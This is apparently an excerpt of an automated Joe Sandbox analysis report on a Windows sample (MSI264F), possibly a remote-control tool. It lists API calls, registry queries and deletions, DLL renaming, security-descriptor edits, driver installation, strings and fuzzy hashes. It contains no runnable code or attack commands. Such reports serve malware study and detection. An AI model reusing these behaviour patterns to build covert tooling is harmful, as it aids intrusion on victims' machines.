                                                                                                                        • RegQueryValueExW.ADVAPI32(?,ProductName,00000000,?,?,00000200), ref: 00B26A58
                                                                                                                          • Part of subcall function 00B01CE0: __wcsdup.LIBCMT ref: 00B01CFA
                                                                                                                        Strings
                                                                                                                        • Software\Microsoft\Windows NT\CurrentVersion, xrefs: 00B269BC
                                                                                                                        • ProductName, xrefs: 00B26A48
                                                                                                                        • CurrentBuildNumber, xrefs: 00B269FC
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: QueryValue$CloseOpen__fassign__wcsdup
                                                                                                                        • String ID: CurrentBuildNumber$ProductName$Software\Microsoft\Windows NT\CurrentVersion
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove
                                                                                                                        • String ID: ..\CTL32\NSMString.cpp$IsA()$iAt<=m_nLength$iAt>=0$pszStr!=NULL
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Find$ClassNameSleep__wcsicoll
                                                                                                                        • String ID: gfff
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00B12700
                                                                                                                        • GetSysColor.USER32(0000000F), ref: 00B12739
                                                                                                                        • GetSysColor.USER32(00000014), ref: 00B12750
                                                                                                                        • GetDC.USER32(00000000), ref: 00B12789
                                                                                                                        • CreateDIBitmap.GDI32(00000000,00000028,00000004,?,00000028,00000000), ref: 00B127A4
                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00B127AF
                                                                                                                        Similarity
                                                                                                                        • API ID: Color$BitmapCreateRelease_memset
                                                                                                                        • String ID: (
                                                                                                                        APIs
                                                                                                                        • GetProfileStringW.KERNEL32(Windows,Device,,,LPT1:,?,00000080), ref: 00B131EE
                                                                                                                        • _wcschr.LIBCMT ref: 00B131FD
                                                                                                                        • _wcschr.LIBCMT ref: 00B13218
                                                                                                                        • _memmove.LIBCMT ref: 00B13246
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcschr$ProfileString_memmove
                                                                                                                        • String ID: ,,LPT1:$Device$Windows
                                                                                                                        APIs
                                                                                                                        • wsprintfW.USER32 ref: 00B00B0C
                                                                                                                        • SetTimer.USER32(00000000,00000000,00000000,00B00120), ref: 00B00B28
                                                                                                                        • MessageBoxW.USER32(00000000,?,?,00000000), ref: 00B00B42
                                                                                                                        • KillTimer.USER32(00000000,00000000), ref: 00B00B4B
                                                                                                                        • PeekMessageW.USER32(?,00000000,00000012,00000012,00000001), ref: 00B00B60
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageTimer$KillPeekwsprintf
                                                                                                                        • String ID: NOT copied to disk$copied to %s
                                                                                                                        APIs
                                                                                                                        • LoadLibraryW.KERNEL32(comctl32.dll), ref: 00B16B03
                                                                                                                        • GetProcAddress.KERNEL32(00000000,LoadIconMetric), ref: 00B16B1D
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00B16B3A
                                                                                                                        • GetSystemMetrics.USER32(00000031), ref: 00B16B4B
                                                                                                                        • LoadImageW.USER32(?,?,00000001,00000000,00000000,00000000), ref: 00B16B5F
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryLoad$AddressFreeImageMetricsProcSystem
                                                                                                                        • String ID: LoadIconMetric$comctl32.dll
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00AFE55C
                                                                                                                        • GetModuleHandleW.KERNEL32(USER32), ref: 00AFE570
                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 00AFE57C
                                                                                                                        • __wcsicoll.LIBCMT ref: 00AFE596
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressHandleModuleProc__wcsicoll_memset
                                                                                                                        • String ID: GetMonitorInfoW$USER32$h
                                                                                                                        APIs
                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 00AE41FD
                                                                                                                        • __wcsicoll.LIBCMT ref: 00AE422A
                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 00AE4237
                                                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00AE424B
                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 00AE4256
                                                                                                                        Strings
                                                                                                                        • ..\CTL32\Config.cpp, xrefs: 00AE420D
                                                                                                                        • (idata->flags & CFG_VOLATILE) == 0, xrefs: 00AE4212
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • API ID: CriticalSection$Leave$DeleteEnter__wcsicoll
                                                                                                                        • String ID: (idata->flags & CFG_VOLATILE) == 0$..\CTL32\Config.cpp
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,08000080,00000000), ref: 00B063A3
                                                                                                                        • API ID: CreateFile
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00B24983
                                                                                                                        • _malloc.LIBCMT ref: 00B2496F
                                                                                                                          • Part of subcall function 00B37CA4: __FF_MSGBANNER.LIBCMT ref: 00B37CBD
                                                                                                                          • Part of subcall function 00B37CA4: __NMSG_WRITE.LIBCMT ref: 00B37CC4
                                                                                                                          • Part of subcall function 00B37CA4: RtlAllocateHeap.NTDLL(00000000,00000001,00000000,?,75BF73E0,?,00B097EE,00000000,?,?), ref: 00B37CE9
                                                                                                                        • _malloc.LIBCMT ref: 00B24999
                                                                                                                        • _memset.LIBCMT ref: 00B249A8
                                                                                                                        • RegEnumKeyExW.ADVAPI32(?,00000001,?,00000080,00000000,00000000,00000000,?), ref: 00B24A89
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00B24AAD
                                                                                                                        • _free.LIBCMT ref: 00B24AC5
                                                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00B24AD9
                                                                                                                        • API ID: _malloc_memset$AllocateCloseDeleteEnumHeap_free
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(?), ref: 00B14930
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00B14943
                                                                                                                        • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00B14963
                                                                                                                        • _malloc.LIBCMT ref: 00B14972
                                                                                                                          • Part of subcall function 00B37CA4: __FF_MSGBANNER.LIBCMT ref: 00B37CBD
                                                                                                                          • Part of subcall function 00B37CA4: __NMSG_WRITE.LIBCMT ref: 00B37CC4
                                                                                                                          • Part of subcall function 00B37CA4: RtlAllocateHeap.NTDLL(00000000,00000001,00000000,?,75BF73E0,?,00B097EE,00000000,?,?), ref: 00B37CE9
                                                                                                                        • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00B14990
                                                                                                                        • _free.LIBCMT ref: 00B149A0
                                                                                                                          • Part of subcall function 00B379A7: HeapFree.KERNEL32(00000000,00000000,?,00B42B7C,00000000,?,00B097EE,00000000), ref: 00B379BD
                                                                                                                          • Part of subcall function 00B379A7: GetLastError.KERNEL32(00000000,?,00B42B7C,00000000,?,00B097EE,00000000), ref: 00B379CF
                                                                                                                        • VerQueryValueW.VERSION(?,00B6A1FC,?,?,?,?,00000000,00000000), ref: 00B149D1
                                                                                                                        • _free.LIBCMT ref: 00B149F4
                                                                                                                        • API ID: File$HeapInfoModuleVersion_free$AllocateErrorFreeHandleLastNameQuerySizeValue_malloc
                                                                                                                        APIs
                                                                                                                        • GetMenuItemCount.USER32(?), ref: 00B1308B
                                                                                                                        • GetSubMenu.USER32(?,00000000), ref: 00B130A8
                                                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 00B130C9
                                                                                                                        • GetMenuItemID.USER32(?,00000001), ref: 00B130D2
                                                                                                                        • GetMenuItemID.USER32(?,-00000001), ref: 00B130DC
                                                                                                                        • DeleteMenu.USER32(?,00000001,00000400), ref: 00B130F2
                                                                                                                        • GetMenuItemID.USER32(?,00000001), ref: 00B130FA
                                                                                                                        • DeleteMenu.USER32(?,-00000001,00000400), ref: 00B13111
                                                                                                                        • API ID: Menu$Item$Delete$Count
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B097D0: _malloc.LIBCMT ref: 00B097E9
                                                                                                                          • Part of subcall function 00B097D0: wsprintfW.USER32 ref: 00B09804
                                                                                                                          • Part of subcall function 00B097D0: _memset.LIBCMT ref: 00B09827
                                                                                                                        • std::exception::exception.LIBCMT ref: 00B20CD3
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00B20CE8
                                                                                                                        • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00B18C1C
                                                                                                                        • SHGetFolderPathW.SHFOLDER(00000000,00000026,00000000,00000000,?,?,?), ref: 00B18C5F
                                                                                                                        • SHGetFolderPathW.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 00B18CB7
                                                                                                                        • API ID: FolderPath$FileModuleName
                                                                                                                        • String ID: ..\CTL32\util.cpp$FALSE || !"wrong nsmdir"$nsmdir < GP_MAX
                                                                                                                        • API String ID: 906376703-468948282
                                                                                                                        APIs
                                                                                                                        • GetWindowsDirectoryW.KERNEL32(?,00000100), ref: 00B2408E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: DirectoryWindows
                                                                                                                        • String ID: .lnk$\Profiles\All Users\Start Menu\Programs\$rb+
                                                                                                                        • API String ID: 3619848164-1848683015
                                                                                                                        APIs
                                                                                                                        • GetProcAddress.KERNEL32(?,GetNamedSecurityInfoW), ref: 00B3284C
                                                                                                                        • DeleteAce.ADVAPI32(00000104,00000000), ref: 00B328B6
                                                                                                                        • GetProcAddress.KERNEL32(00000104,SetNamedSecurityInfoW), ref: 00B328D7
                                                                                                                        • LocalFree.KERNEL32(?), ref: 00B3291E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$DeleteFreeLocal
                                                                                                                        • String ID: GetNamedSecurityInfoW$SetNamedSecurityInfoW
                                                                                                                        • API String ID: 1412278368-2573761906
                                                                                                                        APIs
                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00AF2B59
                                                                                                                          • Part of subcall function 00B61534: std::exception::exception.LIBCMT ref: 00B61549
                                                                                                                          • Part of subcall function 00B61534: __CxxThrowException@8.LIBCMT ref: 00B6155E
                                                                                                                          • Part of subcall function 00B61534: std::exception::exception.LIBCMT ref: 00B6156F
                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00AF2B7A
                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00AF2B98
                                                                                                                        • _memmove.LIBCMT ref: 00AF2C0F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                        • API String ID: 443534600-4289949731
                                                                                                                        APIs
                                                                                                                        • LoadLibraryW.KERNEL32(newdev.dll,5E06C67B), ref: 00AEA123
                                                                                                                        • GetProcAddress.KERNEL32(00000000,UpdateDriverForPlugAndPlayDevicesW), ref: 00AEA135
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00AEA146
                                                                                                                        • GetLastError.KERNEL32 ref: 00AEA1DC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$AddressErrorFreeLastLoadProc
                                                                                                                        • String ID: UpdateDriverForPlugAndPlayDevicesW$newdev.dll
                                                                                                                        • API String ID: 2540614322-3767700378
                                                                                                                        APIs
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?), ref: 00B04C71
                                                                                                                        • _free.LIBCMT ref: 00B04C8C
                                                                                                                          • Part of subcall function 00B379A7: HeapFree.KERNEL32(00000000,00000000,?,00B42B7C,00000000,?,00B097EE,00000000), ref: 00B379BD
                                                                                                                          • Part of subcall function 00B379A7: GetLastError.KERNEL32(00000000,?,00B42B7C,00000000,?,00B097EE,00000000), ref: 00B379CF
                                                                                                                        • _malloc.LIBCMT ref: 00B04C9E
                                                                                                                        • RegQueryValueExW.ADVAPI32(000007FE,?,00000000,?,00000000,000007FE), ref: 00B04CCC
                                                                                                                        • _free.LIBCMT ref: 00B04D60
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: QueryValue_free$ErrorFreeHeapLast_malloc
                                                                                                                        • String ID: Error %d getting %s
                                                                                                                        • API String ID: 582965682-2709163689
                                                                                                                        APIs
                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00AF31E6
                                                                                                                          • Part of subcall function 00B61534: std::exception::exception.LIBCMT ref: 00B61549
                                                                                                                          • Part of subcall function 00B61534: __CxxThrowException@8.LIBCMT ref: 00B6155E
                                                                                                                          • Part of subcall function 00B61534: std::exception::exception.LIBCMT ref: 00B6156F
                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00AF31FC
                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00AF3217
                                                                                                                        • _memmove.LIBCMT ref: 00AF3282
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                        • API String ID: 443534600-4289949731
                                                                                                                        APIs
                                                                                                                        • GetVersion.KERNEL32(5E06C67B,?,00000200,00000000), ref: 00B354C6
                                                                                                                          • Part of subcall function 00AE39D0: LoadLibraryW.KERNEL32(Kernel32.dll,?,00B354DB), ref: 00AE39D8
                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 00B354DF
                                                                                                                        • GetProcAddress.KERNEL32(?,IsWow64Process), ref: 00B354F8
                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 00B35513
                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00B3552A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$AddressCurrentErrorFreeLastLoadProcProcessVersion
                                                                                                                        • String ID: IsWow64Process
                                                                                                                        • API String ID: 3538738240-777008139
                                                                                                                        • Opcode ID: 52c455f85ee927636abfcd39eb81dfbccb62f6de634bdec370957d9eca7ec939
                                                                                                                        • Instruction ID: db2629562c1d88f6cb6567cd0f62bb3a320a5f3fdf43e5839327c8219db3b79b
                                                                                                                        • Opcode Fuzzy Hash: 52c455f85ee927636abfcd39eb81dfbccb62f6de634bdec370957d9eca7ec939
                                                                                                                        • Instruction Fuzzy Hash: 1141C2B0914B459BC760CF6AD94479AFBF9FFA4300F20895FD0AAD3660EBB465008B55
                                                                                                                        APIs
                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00AF2C89
                                                                                                                          • Part of subcall function 00B61534: std::exception::exception.LIBCMT ref: 00B61549
                                                                                                                          • Part of subcall function 00B61534: __CxxThrowException@8.LIBCMT ref: 00B6155E
                                                                                                                          • Part of subcall function 00B61534: std::exception::exception.LIBCMT ref: 00B6156F
                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00AF2CAA
                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00AF2CC5
                                                                                                                        • _memmove.LIBCMT ref: 00AF2D2D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                        • API String ID: 443534600-4289949731
                                                                                                                        • Opcode ID: ce329658ce77e70d85bacb14336f308d550af3439c7fcb8eb3d351d912f8235b
                                                                                                                        • Instruction ID: ff739ddc4533a33b3e40db959b65caa47612a1dd277f984e7f747e60e75b8023
                                                                                                                        • Opcode Fuzzy Hash: ce329658ce77e70d85bacb14336f308d550af3439c7fcb8eb3d351d912f8235b
                                                                                                                        • Instruction Fuzzy Hash: 203184323042188FD724DF9CE880B7AF7E5ABA0721B200A6EF656CB651D7B1DC4187A1
                                                                                                                        APIs
                                                                                                                        • MoveFileExW.KERNEL32(?,?,00000000), ref: 00B22FB6
                                                                                                                        • MoveFileExW.KERNEL32(?,?,00000001), ref: 00B22FE0
                                                                                                                        • MoveFileExW.KERNEL32(?,?,00000001), ref: 00B23053
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FileMove
                                                                                                                        • String ID: .dll$.old$.org
                                                                                                                        • API String ID: 3562171763-1297993771
                                                                                                                        • Opcode ID: 1c4b26c2c7d14fcb141a58fef9c2eafb90bbb20269bbf6e2e431df5461b04ac0
                                                                                                                        • Instruction ID: 3b3f93ff20c4bbf8e9c73d040a50a9d6f2b0ce840a4ad94ef95644a371dc04d6
                                                                                                                        • Opcode Fuzzy Hash: 1c4b26c2c7d14fcb141a58fef9c2eafb90bbb20269bbf6e2e431df5461b04ac0
                                                                                                                        • Instruction Fuzzy Hash: 3541B1759002198ECB20DF5CD956BA6B3F8FF88340F0584D5EE4ACB365E7749A81CB90
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00AF6276
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,InstallLocation,00000000,00000000,?,00000400), ref: 00AF629C
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,DisplayIcon,00000000,00000000,?,00000400), ref: 00AF62DA
                                                                                                                        • _wcschr.LIBCMT ref: 00AF630A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: QueryValue$_memset_wcschr
                                                                                                                        • String ID: DisplayIcon$InstallLocation
                                                                                                                        • API String ID: 3777521832-1034514769
                                                                                                                        • Opcode ID: 3924b29b8b4ccf0b146aebfecb3bcdde411f41f4e1223acaf0b1ede61c7b98d0
                                                                                                                        • Instruction ID: 6e3517c51804ae27443d748aea2c23a4cdb746b4fa8ce0ec8197b80ade7b77fb
                                                                                                                        • Opcode Fuzzy Hash: 3924b29b8b4ccf0b146aebfecb3bcdde411f41f4e1223acaf0b1ede61c7b98d0
                                                                                                                        • Instruction Fuzzy Hash: D13164F590021D9ADB20DB54CD52FEB73B8DF84704F044699F709AB281EBB06B49CB99
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B492EA: __mtinitlocknum.LIBCMT ref: 00B49300
                                                                                                                          • Part of subcall function 00B492EA: __amsg_exit.LIBCMT ref: 00B4930C
                                                                                                                          • Part of subcall function 00B492EA: EnterCriticalSection.KERNEL32(?,?,?,00B42AA8,0000000D,?,00B097EE,00000000,?,?), ref: 00B49314
                                                                                                                        • __mtinitlocknum.LIBCMT ref: 00B443F8
                                                                                                                        • __malloc_crt.LIBCMT ref: 00B44439
                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000FA0,00B833F0,00000010,00B39517,00B82EE8,0000000C,00B39595,?,00B006CD,00000040,?,00B006CD,?,00B6DD1C), ref: 00B4445D
                                                                                                                        • _free.LIBCMT ref: 00B4446F
                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,00B006CD,?,00B6DD1C), ref: 00B44486
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
